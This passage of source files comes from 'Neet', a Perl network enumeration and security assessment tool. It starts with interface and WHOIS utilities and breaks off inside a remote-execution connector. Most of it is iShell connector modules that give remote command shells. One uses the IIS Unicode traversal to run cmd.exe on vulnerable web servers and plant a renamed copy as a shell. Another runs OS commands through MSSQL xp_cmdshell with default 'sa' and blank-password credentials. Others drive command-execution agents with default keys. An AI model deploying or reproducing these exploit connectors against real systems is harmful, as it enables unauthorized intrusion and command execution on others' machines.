my $range=shift(); 66 | if ($range =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\-\d{1,3}$/){ 67 | return 1; 68 | } else { 69 | return 0; 70 | } 71 | } 72 | 73 | sub isInterface { 74 | my $interface=shift(); 75 | return 0 if (!$interface || $interface =~ /\W/ || $interface !~ /\d/); 76 | my $rc=system("/sbin/ifconfig $interface >/dev/null 2>&1"); 77 | $rc = $rc>>8; 78 | if ($rc == 0){ 79 | return 1; 80 | } 81 | return 0; 82 | } 83 | 84 | sub InterfaceIP { 85 | my $Interface=shift(); 86 | return 0 if (!$Interface); 87 | return 0 if (!isInterface($Interface)); 88 | my @ifconfig=`/sbin/ip addr show`; 89 | my ($address,$mask,$broadcast,$mac,$object)=interfaceInfo ($Interface,@ifconfig); 90 | return $address; 91 | } 92 | 93 | sub interfaceIP { 94 | my $interface=shift(); 95 | return undef if (!isInterface($interface)); 96 | my @ifconfig=`/sbin/ip addr show`; 97 | my ($address,$mask,$broadcast,$mac,$object)=interfaceInfo ($interface,@ifconfig); 98 | return $address; 99 | } 100 | 101 | sub interfaceMask { 102 | my $interface=shift(); 103 | return undef if (!isInterface($interface)); 104 | my @ifconfig=`/sbin/ip addr show`; 105 | my ($address,$mask,$broadcast,$mac,$object)=interfaceInfo ($interface,@ifconfig); 106 | return $mask; 107 | } 108 | 109 | sub interfaceInfo { 110 | my $interface=shift(); 111 | my @ifdata=@_; 112 | return undef if ($#ifdata < 6); 113 | 114 | if ("$interface" eq "list"){ 115 | my @interfaces; 116 | for my $line (@ifdata){ 117 | next if ($line !~ /^\d+:\s/); 118 | next if ($line =~ /state DOWN/); 119 | $line =~ m/\d:\s(\S+):\s+\<*/; 120 | push @interfaces, $1; 121 | } 122 | return @interfaces; 123 | } 124 | 125 | my $thisInterface=0; 126 | my ($address,$mask,$broadcast,$mac,$object); 127 | 128 | for my $line (@ifdata){ 129 | if ($line =~ /\s$interface:\s/){ 130 | $thisInterface=1; 131 | return undef if ($line =~ /state DOWN/); 132 | next; 133 | } 134 | if ($thisInterface){ 135 | if ($line =~ /^\s{0,}inet\s/){ 136 | if ($line =~ /\speer\s/){ 137 | # Point to point link - No MAC, 32-bit address 138 | $line =~ m/^\s{0,}inet\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s+peer\s+[\S\s]+$/; 139 | $address=$1 . "/32"; 140 | $broadcast=$1; 141 | $mac=""; 142 | } else { 143 | # Standard network type addressing 144 | $line =~ m/^\s{0,}inet\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})\s+brd\s+(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s[\S\s]+$/; 145 | $address=$1; 146 | $broadcast=$2; 147 | } 148 | next; 149 | } 150 | if ($line =~ /^\s{0,}link\/ether\s/){ 151 | $line =~ m/^\s{0,}link\/ether\s(\S+)\s+brd\s+[\S\s]+/; 152 | $mac=$1; 153 | next; 154 | } 155 | if ($line =~ /^\d+:/){ 156 | $thisInterface=0; 157 | last; 158 | } 159 | } 160 | } 161 | 162 | if ($address){ 163 | $object=NetAddr::IP->new($address); 164 | $mask=$object->mask(); 165 | $address=$object->addr(); 166 | } 167 | 168 | return ($address,$mask,$broadcast,$mac,$object); 169 | } 170 | 171 | 172 | 1; 173 | -------------------------------------------------------------------------------- /content/main/JR/NetUtils/WHOIS.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | package JR::NetUtils::WHOIS; 24 | 25 | sub new { 26 | use IO::Socket::INET; 27 | my $pkg=shift(); 28 | my %object; 29 | @{$object{'sources'}}=("whois.ripe.net","whois.arin.net","whois.apnic.net","whois.lacnic.net","whois.afrinic.net"); 30 | my $self=\%object; 31 | bless $self, $pkg; 32 | return $self; 33 | } 34 | 35 | sub lookup { 36 | my $self=shift(); 37 | my $record=shift(); 38 | for my $source (@{$$self{'sources'}}){ 39 | my $res=$self->query_server($source,$record); 40 | return 1 if ($res); 41 | } 42 | return 0; 43 | } 44 | 45 | 46 | sub data { 47 | my $self=shift(); 48 | return @{$$self{'data'}}; 49 | } 50 | sub source { 51 | my $self=shift(); 52 | return $$self{'source'}; 53 | } 54 | 55 | sub query_server { 56 | my $self=shift(); 57 | my $source=shift(); 58 | my $record=shift(); 59 | my $success=0; 60 | my @data; 61 | my $sock=IO::Socket::INET->new( 'Proto' => 'tcp', 'PeerAddr' => "$source", 62 | 'PeerPort' => '43'); 63 | if ($sock){ 64 | print $sock "$record\n"; 65 | @data=<$sock>; 66 | close $sock; 67 | for my $line (@data){ 68 | if ($line =~ /^ReferralServer:\s/){ 69 | my ($j,$s) = split (" ", $line, 2); 70 | $s =~ s/whois:\/\/([\S]+)\W/$1/; 71 | $$self{'referral'}=$s; 72 | $success=0; 73 | last; 74 | } 75 | if ($line =~ /^person:\s/ || $line =~ /^origin:\s/ || $line =~ /^NameServer:\s/ || $line =~ /^OrgName:\s/){ 76 | $success=1; 77 | } 78 | 79 | } 80 | if ($success){ 81 | @{$$self{'data'}}=@data; 82 | $$self{'source'}=$source; 83 | } 84 | } 85 | return $success; 86 | } 87 | 88 | 1; 89 | 90 | -------------------------------------------------------------------------------- /content/main/JR/iShell/ConnectorCPCE.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # JR::ConnectorCPCE.pm 24 | 25 | # This is the CPCE connector for the ishell command shell framework. 26 | # Jonathan Roach 27 | 28 | # It uses CPCE in pure PERL to provide access to a remote box via JR's CPCE mechanism 29 | 30 | # All connectors should provide the same base interface to the calling iShell. 31 | # new -> create a new instance of the connector. This should only return a connector object 32 | # if the initial connection succeeds 33 | # test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or 34 | # otherwise 0 35 | # execute -> execute this system command - returns an array of output 36 | # ServerTime -> get the date/time from the server 37 | # OS -> get the OS version 38 | # Server -> get the Server version 39 | # Args -> return a hash of parameters that should be supplied. 40 | # BaseDir -> get the directory that the exploited service is based 41 | # Environment -> get a hash of the environment variables 42 | # disconnect -> Close the connection 43 | 44 | package JR::iShell::ConnectorCPCE; 45 | use JR::Process::RemoteCommandExecution; 46 | 47 | sub new { 48 | my $PKG=shift(); 49 | my %CPCE=@_; 50 | 51 | my %RequiredArgs; 52 | $RequiredArgs{'Args'}="Host Port Key KeyFile"; 53 | $RequiredArgs{'Optional'}="Host Port Key KeyFile"; 54 | $RequiredArgs{'Mandatory'}=""; 55 | $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1"; 56 | $RequiredArgs{'Defaults'}{'Port'}="65467"; 57 | $RequiredArgs{'Defaults'}{'Key'}="123123"; 58 | 59 | my %Connector; 60 | $CPCE{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$CPCE{"Host"}); 61 | $CPCE{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$CPCE{"Port"}); 62 | $CPCE{"Key"}="$RequiredArgs{'Defaults'}{'Key'}" if (!$CPCE{"Key"}); 63 | my $Client; 64 | if (!defined($CPCE{'KeyFile'})){ 65 | $Client=CPCEClient->new('ServerAddr'=>$CPCE{"Host"}, 'CPCEPort'=>$CPCE{"Port"}, 'Key'=>$CPCE{'Key'}); 66 | } else { 67 | $Client=CPCEClient->new('ServerAddr'=>$CPCE{"Host"}, 'CPCEPort'=>$CPCE{"Port"}, 'KeyFile'=>$CPCE{'KeyFile'}); 68 | } 69 | if ($Client){ 70 | $CPCE{"Connected"}=1; 71 | $CPCE{'Handle'}=$Client; 72 | } else { 73 | return undef; 74 | } 75 | $CPCE{'Type'}="Windows"; 76 | $CPCE{'RequiredArgs'}=\%RequiredArgs; 77 | 78 | my $ConnectorObject=\%CPCE; 79 | bless $ConnectorObject, $PKG; 80 | return $ConnectorObject; 81 | } 82 | 83 | sub test { 84 | my $OBJ=shift(); 85 | my $out=$OBJ->execute("ver"); 86 | if ($out){ 87 | return 1; 88 | } 89 | return 0; 90 | } 91 | 92 | sub execute { 93 | my $OBJ=shift(); 94 | my $command=shift(); 95 | my $Client=${$OBJ}{'Handle'}; 96 | my @result; 97 | my $output=$Client->RemoteExec("$command"); 98 | @result = split /\n/, $output if ($output); 99 | return @result; 100 | } 101 | 102 | sub ServerTime { 103 | my $OBJ=shift(); 104 | my @result=$OBJ->execute("echo . | date"); 105 | my $date=$result[0]; 106 | $date=substr($date,index($date,"is:")+4,length($date)-(index($date,"is:")+4)); 107 | @result=$OBJ->execute("echo . | time"); 108 | my $time=$result[0]; 109 | $time=substr($time,index($time,"is:")+4,length($time)-(index($time,"is:")+4)); 110 | return "$date$time"; 111 | } 112 | 113 | sub OS { 114 | my $OBJ=shift(); 115 | my @result=$OBJ->execute("ver"); 116 | return $result[1]; 117 | } 118 | 119 | sub Args { 120 | my $OBJ=shift(); 121 | return %{$$OBJ{'RequiredArgs'}}; 122 | } 123 | 124 | sub Server { 125 | my $OBJ=shift(); 126 | my @result=$OBJ->execute("ver"); 127 | return $result[1]; 128 | } 129 | 130 | sub BaseDir { 131 | my $OBJ=shift(); 132 | my @result=$OBJ->execute("cd"); 133 | return $result[0]; 134 | } 135 | 136 | sub Environment { 137 | my $OBJ=shift(); 138 | my @result=$OBJ->execute("set"); 139 | my %env; 140 | for my $line (@result){ 141 | next if (!$line); 142 | my ($var,$val)=split "=", $line; 143 | $env{$var}=$val; 144 | } 145 | return %env; 146 | } 147 | 148 | sub disconnect { 149 | my $OBJ=shift(); 150 | return 0; 151 | } 152 | 153 | sub close { 154 | my $OBJ=shift(); 155 | return disconnect($OBJ); 156 | } 157 | 158 | sub register { 159 | # Gets called at installation time 160 | eval { 161 | require JR::Catalog; 162 | }; 163 | if ($@){ 164 | print STDERR "Couldn't load JR::Catalog. Didn't register.\n"; 165 | return 0; 166 | } 167 | my $reg=Catalog->new; 168 | if (!$reg->isRegistered("Module"=>"ConnectorNativeMSSQL")){ 169 | return $reg->Register("Type"=>"iShellConnector","Object"=>"NativeMSSQL","Module"=>"ConnectorNativeMSSQL"); 170 | } 171 | return 0; 172 | } 173 | 174 | 1; 175 | -------------------------------------------------------------------------------- /content/main/JR/iShell/ConnectorIISUnicode.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # JR::ConnectorIISUnicode.pm 24 | 25 | # This is the "IIS Unicode" connector for the ishell command shell framework. 26 | # Jonathan Roach 27 | 28 | # It uses HTTP/HTTPS to obtain command execution on vulnerable hosts. 29 | 30 | # All connectors should provide the same base interface to the calling iShell. 31 | # new -> create a new instance of the connector. This should only return a connector object 32 | # if the initial connection succeeds 33 | # test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or 34 | # otherwise 0 35 | # execute -> execute this system command - returns an array of output 36 | # ServerTime -> get the date/time from the server 37 | # OS -> get the OS version 38 | # Server -> get the Server version 39 | # Args -> return a hash of parameters that should be supplied. 40 | # BaseDir -> get the directory that the exploited service is based 41 | # Environment -> get a hash of the environment variables 42 | # disconnect -> Close the connection 43 | 44 | 45 | use strict; 46 | 47 | package JR::iShell::ConnectorIISUnicode; 48 | use IO::Socket; 49 | use JR::Parsers::OutputIsolator; 50 | 51 | sub new { 52 | my $PKG=shift(); 53 | my %IISServer=@_; 54 | my %Connector; 55 | 56 | my %RequiredArgs; 57 | $RequiredArgs{'Args'}="Host Port SSL"; 58 | $RequiredArgs{'Optional'}="Host Port SSL"; 59 | $RequiredArgs{'Mandatory'}=""; 60 | $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1"; 61 | $RequiredArgs{'Defaults'}{'Port'}="80"; 62 | $RequiredArgs{'Defaults'}{'SSL'}="0"; 63 | 64 | $IISServer{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$IISServer{"Host"}); 65 | $IISServer{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$IISServer{"Port"}); 66 | $IISServer{'SSL'}="$RequiredArgs{'Defaults'}{'SSL'}" if (!$IISServer{"SSL"}); 67 | 68 | $IISServer{'Type'}="Windows"; 69 | $IISServer{'SysPath'}="..%255c..%255c..%255cwinnt/system32/"; 70 | $IISServer{'Path'}=$IISServer{'SysPath'}; 71 | $IISServer{'CommandInterpreter'}="cmd.exe"; 72 | $IISServer{'RequiredArgs'}=\%RequiredArgs; 73 | 74 | $IISServer{'HTMLobj'}=new OutputIsolator(); 75 | my $ConnectorObject=\%IISServer; 76 | bless $ConnectorObject, $PKG; 77 | return $ConnectorObject; 78 | } 79 | 80 | sub test { 81 | my $IISServer=shift(); 82 | my $OutputIsolator=$$IISServer{'HTMLobj'}; 83 | my $teststring="__OutputIsolatorCalibration__OICalibrate__"x3; 84 | for (my $a=0; $a<10; $a++){ 85 | # This is not required to be cryptographically strong!! :-) 86 | $teststring .= int(rand(1000)); 87 | } 88 | print "Calibrating...\n"; 89 | until ($OutputIsolator->isCalibrated){ 90 | $OutputIsolator->LoadPage($IISServer->_subSubmit("echo $teststring")); 91 | $OutputIsolator->Calibrate("$teststring"); 92 | } 93 | #print "Calibrated at " . $$OutputIsolator{'Index'} . "\n"; 94 | my $Base=$IISServer->BaseDir; 95 | $$IISServer{'Base'}=$Base; 96 | 97 | # Now get a command shell we can use 98 | my $tempshell="phlux.exe"; 99 | print "Getting our own command shell...\n"; 100 | $IISServer->execute("if exist $Base\\tmp.exe del $Base\\tmp.exe"); 101 | $IISServer->execute("copy C:\\winnt\\system32\\cmd.exe $Base\\$tempshell"); 102 | my @results=$IISServer->execute("dir"); 103 | my $ok=0; 104 | for my $line (@results){ 105 | if ($line =~ /\s$tempshell$/){ 106 | $ok=1; 107 | } 108 | } 109 | if ($ok){ 110 | $$IISServer{'Path'}=""; 111 | $$IISServer{'CommandInterpreter'}="$tempshell"; 112 | } 113 | return $ok; 114 | } 115 | 116 | sub execute { 117 | my $IISServer=shift(); 118 | my $OutputIsolator=$$IISServer{'HTMLobj'}; 119 | my $fullcommand=shift(); 120 | my $exe=$$IISServer{'CommandInterpreter'}; 121 | my $path=$$IISServer{'Path'}; 122 | my @commands = split "&&", $fullcommand; 123 | my @newcommand; 124 | for my $command (@commands){ 125 | $command =~ s/^\s+//; 126 | if ($command =~ /xcopy /){ 127 | $exe="xcopy.exe"; 128 | $path=$$IISServer{'SysPath'}; 129 | $command =~ s/xcopy //; 130 | pop @newcommand; 131 | } 132 | if ($command =~ /net /){ 133 | $exe="net.exe"; 134 | $path=$$IISServer{'SysPath'}; 135 | $command =~ s/net //; 136 | pop @newcommand; 137 | } 138 | if ($command =~ /net1 /){ 139 | $exe="net1.exe"; 140 | $path=$$IISServer{'SysPath'}; 141 | $command =~ s/net1 //; 142 | pop @newcommand; 143 | } 144 | if ($command =~ /attrib /){ 145 | $exe="attrib.exe"; 146 | $path=$$IISServer{'SysPath'}; 147 | $command =~ s/attrib //; 148 | pop @newcommand; 149 | } 150 | push @newcommand, $command; 151 | } 152 | my $command=join "&& ", @newcommand; 153 | $command = "/c+" . $command if (("$exe" eq "$$IISServer{'CommandInterpreter'}") || ("$exe" eq "cmd.exe")); 154 | $exe = $path . $exe; 155 | my $cmd="/scripts/" . $exe . "?$command"; 156 | my @res=$IISServer->httpget($cmd); 157 | $OutputIsolator->LoadPage(@res); 158 | my @results=$OutputIsolator->GetOutput; 159 | return @results; 160 | } 161 | 162 | sub _subSubmit { 163 | my $IISServer=shift(); 164 | my $command=shift(); 165 | my $exe=$$IISServer{'Path'} . $$IISServer{'CommandInterpreter'}; 166 | my $cmd="/scripts/" . $exe . "?/c+$command"; 167 | my @result=$IISServer->httpget($cmd); 168 | return @result; 169 | } 170 | 171 | sub ServerTime { 172 | my $OBJ=shift(); 173 | return $$OBJ{'Date'}; 174 | } 175 | 176 | sub OS { 177 | my $OBJ=shift(); 178 | my @result=$OBJ->execute("ver"); 179 | return $result[1]; 180 | } 181 | 182 | sub Args { 183 | my $OBJ=shift(); 184 | return %{$$OBJ{'RequiredArgs'}}; 185 | } 186 | 187 | sub Server { 188 | my $OBJ=shift(); 189 | return $$OBJ{'Server'}; 190 | } 191 | 192 | sub BaseDir { 193 | my $OBJ=shift(); 194 | my @result=$OBJ->execute("cd"); 195 | return $result[0]; 196 | } 197 | 198 | sub Environment { 199 | my $OBJ=shift(); 200 | my @result=$OBJ->execute("set"); 201 | my %env; 202 | for my $line (@result){ 203 | next if (!$line); 204 | my ($var,$val)=split "=", $line; 205 | $env{$var}=$val; 206 | } 207 | return %env; 208 | } 209 | 210 | sub disconnect { 211 | my $OBJ=shift(); 212 | return 1; 213 | } 214 | 215 | sub close { 216 | my $OBJ=shift(); 217 | return disconnect($OBJ); 218 | } 219 | 220 | sub httpget { 221 | my $IISServer=shift(); 222 | my $Host=$$IISServer{'Host'}; 223 | my $Port=$$IISServer{'Port'}; 224 | my $cmd = urlencode(shift()); 225 | my $headercount=0; my $timeout=10; my $tries=0; 226 | my $headers="Connection: Keep-Alive\r\n"; 227 | my @output; 228 | while (!$headercount){ 229 | $tries++; 230 | my $socket = IO::Socket::INET->new('PeerAddr'=>"$Host", 'PeerPort'=>"$Port", 'Proto'=>'tcp', 'Blocking'=>'1', 'Timeout'=>'10'); 231 | print $socket "GET $cmd HTTP/1.1\r\nHost: $Host\r\n$headers\r\n"; 232 | my @raw=<$socket>; 233 | $socket->close; 234 | my $head=1; 235 | for my $line (@raw){ 236 | if ($line !~ /\S/){ 237 | $head=0; 238 | next; 239 | } 240 | if ($head){ 241 | $headercount++; 242 | if ($line =~ /^Server: /){ 243 | $line =~ s/[\r\n]//g; 244 | $$IISServer{'Server'}=substr($line,index($line," ")+1,length($line)-index($line," ")); 245 | } 246 | if ($line =~ /^Date: /){ 247 | $line =~ s/[\r\n]//g; 248 | $$IISServer{'Date'}=substr($line,index($line," ")+1,length($line)-index($line," ")); 249 | } 250 | } else { 251 | push @output, $line; 252 | } 253 | } 254 | if ($tries > $timeout) { 255 | print STDERR ("Couldn't get HTTP response\n"); 256 | sleep 5; 257 | return undef; 258 | } 259 | } 260 | return @output; 261 | } 262 | 263 | sub urlencode { 264 | my $string=shift(); 265 | $string =~ s/ /%20/g; 266 | $string =~ s/&/%26/g; 267 | return $string; 268 | } 269 | 270 | 271 | sub register { 272 | # Gets called at installation time 273 | eval { 274 | require JR::Catalog; 275 | }; 276 | if ($@){ 277 | print STDERR "Couldn't load JR::Catalog. Didn't register.\n"; 278 | return 0; 279 | } 280 | my $reg=Catalog->new; 281 | if (!$reg->isRegistered("Module"=>"ConnectorIISUnicode")){ 282 | return $reg->Register("Type"=>"iShellConnector","Object"=>"IISUnicode","Module"=>"ConnectorIISUnicode"); 283 | } 284 | return 0; 285 | } 286 | 287 | 1; 288 | 289 | 290 | -------------------------------------------------------------------------------- /content/main/JR/iShell/ConnectorNativeMSSQL.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # JR::ConnectorNativeMSSQL.pm 24 | 25 | # This is the "Native MSSQL" connector for the ishell command shell framework. 26 | # Jonathan Roach 27 | 28 | # It uses DBI, DBD::Sybase and FreeTDS to provide 29 | # access to MS-SQL via the TDS protocol (a la TCP/1433 access). 30 | 31 | # All connectors should provide the same base interface to the calling iShell. 32 | # new -> create a new instance of the connector. This should only return a connector object 33 | # if the initial connection succeeds 34 | # test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or 35 | # otherwise 0 36 | # execute -> execute this system command - returns an array of output 37 | # ServerTime -> get the date/time from the server 38 | # OS -> get the OS version 39 | # Server -> get the Server version 40 | # Args -> return a hash of parameters that should be supplied. 41 | # BaseDir -> get the directory that the exploited service is based 42 | # Environment -> get a hash of the environment variables 43 | # disconnect -> Close the connection 44 | 45 | package JR::iShell::ConnectorNativeMSSQL; 46 | use DBI; 47 | 48 | sub new { 49 | my $PKG=shift(); 50 | my %SQLServer=@_; 51 | my %RequiredArgs; 52 | $RequiredArgs{'Args'}="Host Port User Pass"; 53 | $RequiredArgs{'Optional'}="Host Port User Pass"; 54 | $RequiredArgs{'Mandatory'}=""; 55 | $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1"; 56 | $RequiredArgs{'Defaults'}{'Port'}="1433"; 57 | $RequiredArgs{'Defaults'}{'User'}="sa"; 58 | $RequiredArgs{'Defaults'}{'Pass'}=""; 59 | 60 | my %Connector; 61 | $SQLServer{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$SQLServer{"Host"}); 62 | $SQLServer{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$SQLServer{"Port"}); 63 | $SQLServer{"User"}="$RequiredArgs{'Defaults'}{'User'}" if (!$SQLServer{"User"}); 64 | $SQLServer{"Pass"}="$RequiredArgs{'Defaults'}{'Pass'}" if (!$SQLServer{"Pass"}); 65 | my $server = "dbi:Sybase:server=" . $SQLServer{'Host'} . ":" . $SQLServer{'Port'}; 66 | 67 | my $dbh = DBI->connect($server,$SQLServer{'User'},$SQLServer{'Pass'}); 68 | if ($dbh){ 69 | $SQLServer{"Handle"}=$dbh; 70 | $SQLServer{"Connected"}=1; 71 | } else { 72 | return undef; 73 | } 74 | $SQLServer{'Type'}="Windows"; 75 | $SQLServer{'RequiredArgs'}=\%RequiredArgs; 76 | 77 | my $ConnectorObject=\%SQLServer; 78 | bless $ConnectorObject, $PKG; 79 | return $ConnectorObject; 80 | } 81 | 82 | sub test { 83 | my $OBJ=shift(); 84 | my @res=$OBJ->execute("ver"); 85 | if ($#res <0){ 86 | return 0; 87 | } 88 | return 1; 89 | } 90 | 91 | sub runsql { 92 | my $OBJ=shift(); 93 | my $sql=shift(); 94 | my $dbh=${$OBJ}{'Handle'}; 95 | my @result; 96 | my $sth = $dbh->prepare("$sql"); 97 | my $rv = $sth->execute; 98 | my @tmpresults; 99 | while (@tmpresults=$sth->fetchrow_array){ 100 | for my $row (@tmpresults){ 101 | if ($row){ 102 | push @result, $row; 103 | } else { 104 | push @result, ""; 105 | } 106 | } 107 | } 108 | $sth->finish; 109 | return @result; 110 | } 111 | 112 | 113 | sub execute { 114 | my $OBJ=shift(); 115 | my $command=shift(); 116 | my $dbh=${$OBJ}{'Handle'}; 117 | my @result; 118 | $command =~ s/\]/\]\]/g; 119 | my $sth = $dbh->prepare("EXEC master..xp_cmdshell [$command]"); 120 | my $rv = $sth->execute; 121 | my @tmpresults; 122 | while (@tmpresults=$sth->fetchrow_array){ 123 | for my $row (@tmpresults){ 124 | if ($row){ 125 | push @result, $row; 126 | } else { 127 | push @result, ""; 128 | } 129 | } 130 | } 131 | $sth->finish; 132 | return @result; 133 | } 134 | 135 | sub ServerTime { 136 | my $OBJ=shift(); 137 | my @result=$OBJ->execute("date"); 138 | my $date=$result[0]; 139 | $date=substr($date,index($date,"is:")+4,length($date)-(index($date,"is:")+4)); 140 | @result=$OBJ->execute("time"); 141 | my $time=$result[0]; 142 | $time=substr($time,index($time,"is:")+4,length($time)-(index($time,"is:")+4)); 143 | return "$date$time"; 144 | } 145 | 146 | sub OS { 147 | my $OBJ=shift(); 148 | my @result=$OBJ->execute("ver"); 149 | return $result[1]; 150 | } 151 | 152 | sub Args { 153 | my $OBJ=shift(); 154 | return %{$$OBJ{'RequiredArgs'}}; 155 | } 156 | 157 | sub Server { 158 | my $OBJ=shift(); 159 | my $dbh=${$OBJ}{'Handle'}; 160 | my @result; 161 | my $sth = $dbh->prepare("select @\@version"); 162 | my $rv = $sth->execute; 163 | my @tmpresults; 164 | while (@tmpresults=$sth->fetchrow_array){ 165 | for my $row (@tmpresults){ 166 | if ($row){ 167 | push @result, $row; 168 | } else { 169 | push @result, ""; 170 | } 171 | } 172 | } 173 | $sth->finish; 174 | return $result[0]; 175 | } 176 | 177 | sub BaseDir { 178 | my $OBJ=shift(); 179 | my @result=$OBJ->execute("cd"); 180 | return $result[0]; 181 | } 182 | 183 | sub Environment { 184 | my $OBJ=shift(); 185 | my @result=$OBJ->execute("set"); 186 | my %env; 187 | for my $line (@result){ 188 | next if (!$line); 189 | my ($var,$val)=split "=", $line; 190 | $env{$var}=$val; 191 | } 192 | return %env; 193 | } 194 | 195 | sub disconnect { 196 | my $OBJ=shift(); 197 | my $dbh=${$OBJ}{'Handle'}; 198 | return $dbh->disconnect; 199 | } 200 | 201 | sub close { 202 | my $OBJ=shift(); 203 | return disconnect($OBJ); 204 | } 205 | 206 | sub register { 207 | # Gets called at installation time 208 | eval { 209 | require JR::Catalog; 210 | }; 211 | if ($@){ 212 | print STDERR "Couldn't load JR::Catalog. Didn't register.\n"; 213 | return 0; 214 | } 215 | my $reg=Catalog->new; 216 | if (!$reg->isRegistered("Module"=>"ConnectorNativeMSSQL")){ 217 | return $reg->Register("Type"=>"iShellConnector","Object"=>"NativeMSSQL","Module"=>"ConnectorNativeMSSQL"); 218 | } 219 | return 0; 220 | } 221 | 222 | 1; 223 | -------------------------------------------------------------------------------- /content/main/JR/iShell/ConnectorRCE.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # JR::ConnectorRCE.pm 24 | 25 | # This is the RCE connector for the ishell command shell framework. 26 | # Jonathan Roach 27 | 28 | # It uses RCE in pure PERL to provide access to a remote box via JR's RCE mechanism 29 | 30 | # All connectors should provide the same base interface to the calling iShell. 31 | # new -> create a new instance of the connector. This should only return a connector object 32 | # if the initial connection succeeds 33 | # test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or 34 | # otherwise 0 35 | # execute -> execute this system command - returns an array of output 36 | # ServerTime -> get the date/time from the server 37 | # OS -> get the OS version 38 | # Server -> get the Server version 39 | # Args -> return a hash of parameters that should be supplied. 40 | # BaseDir -> get the directory that the exploited service is based 41 | # Environment -> get a hash of the environment variables 42 | # disconnect -> Close the connection 43 | 44 | package JR::iShell::ConnectorRCE; 45 | use JR::Process::RCE; 46 | 47 | sub new { 48 | my $PKG=shift(); 49 | my %RCE=@_; 50 | 51 | my %RequiredArgs; 52 | $RequiredArgs{'Args'}="Host Port Key KeyFile"; 53 | $RequiredArgs{'Optional'}="Host Port Key KeyFile"; 54 | $RequiredArgs{'Mandatory'}=""; 55 | $RequiredArgs{'Defaults'}{'Host'}="127.0.0.1"; 56 | $RequiredArgs{'Defaults'}{'Port'}="65467"; 57 | $RequiredArgs{'Defaults'}{'Key'}="123123"; 58 | 59 | my %Connector; 60 | 